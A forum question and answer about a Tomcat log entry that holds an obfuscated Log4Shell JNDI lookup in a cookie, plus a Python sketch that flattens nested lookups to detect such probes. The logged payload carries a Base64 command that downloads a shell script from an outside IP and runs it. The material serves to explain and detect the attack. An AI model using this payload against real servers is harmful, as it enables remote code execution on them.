2

From Tomcat9 catalina log:

org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie 
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.

What is the cookie? Is it an attack?

eastwater

1 Answer

4

This is a probe of your installation for the Log4Shell attack.

By default, Tomcat is immune to the attack.

But you could still be subject to the attack if you (in your custom webapp) use a vulnerable log4j version.

Tim Funk
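
Added example (not part of the question or the answer): a plain search for "jndi:" misses the logged cookie because the string is assembled from nested ${env:BARFOO:-x} lookups that fall back to their default value. The sketch below flattens those defaults before matching; it also handles the ${lower:}/${upper:} lookups, which goes beyond the form shown in the log. The function names and the sample string with its PAYLOAD_PLACEHOLDER are constructed for illustration.

```python
import re

# Innermost ${...}: a body that contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the nesting is flattened: scheme, then host[:port].
_JNDI = re.compile(r"\$\{\s*jndi:(\w+):/*([^/}\s]+)", re.IGNORECASE)


def _resolve(m):
    body = m.group(1)
    if body.lower().lstrip().startswith("jndi:"):
        return m.group(0)                # the lookup we are hunting for: keep it
    if ":-" in body:                     # ${env:BARFOO:-j} yields "j" when BARFOO is unset
        return body.split(":-", 1)[1]
    for prefix in ("lower:", "upper:"):  # case lookups; matching is case-insensitive anyway
        if body.lower().startswith(prefix):
            return body[len(prefix):]
    return m.group(0)                    # any other lookup is left untouched


def normalize(text, max_passes=20):
    """Flatten nested lookups inside-out until nothing changes (bounded)."""
    for _ in range(max_passes):
        flattened = _INNER.sub(_resolve, text)
        if flattened == text:
            break
        text = flattened
    return text


def find_jndi(text):
    """Return (scheme, host) of a JNDI lookup hidden in text, or None."""
    m = _JNDI.search(normalize(text))
    return (m.group(1).lower(), m.group(2)) if m else None


# Constructed sample modelled on the log line in the question; the Base64
# command segment is replaced by a placeholder and "ip" is kept as logged.
SAMPLE = ("[('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap"
          "${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/"
          "PAYLOAD_PLACEHOLDER}')]")

if __name__ == "__main__":
    print(normalize(SAMPLE))
    print(find_jndi(SAMPLE))
```

Run over catalina or access logs, a non-None result marks a line for triage; it says a probe arrived, not that a vulnerable log4j version processed it.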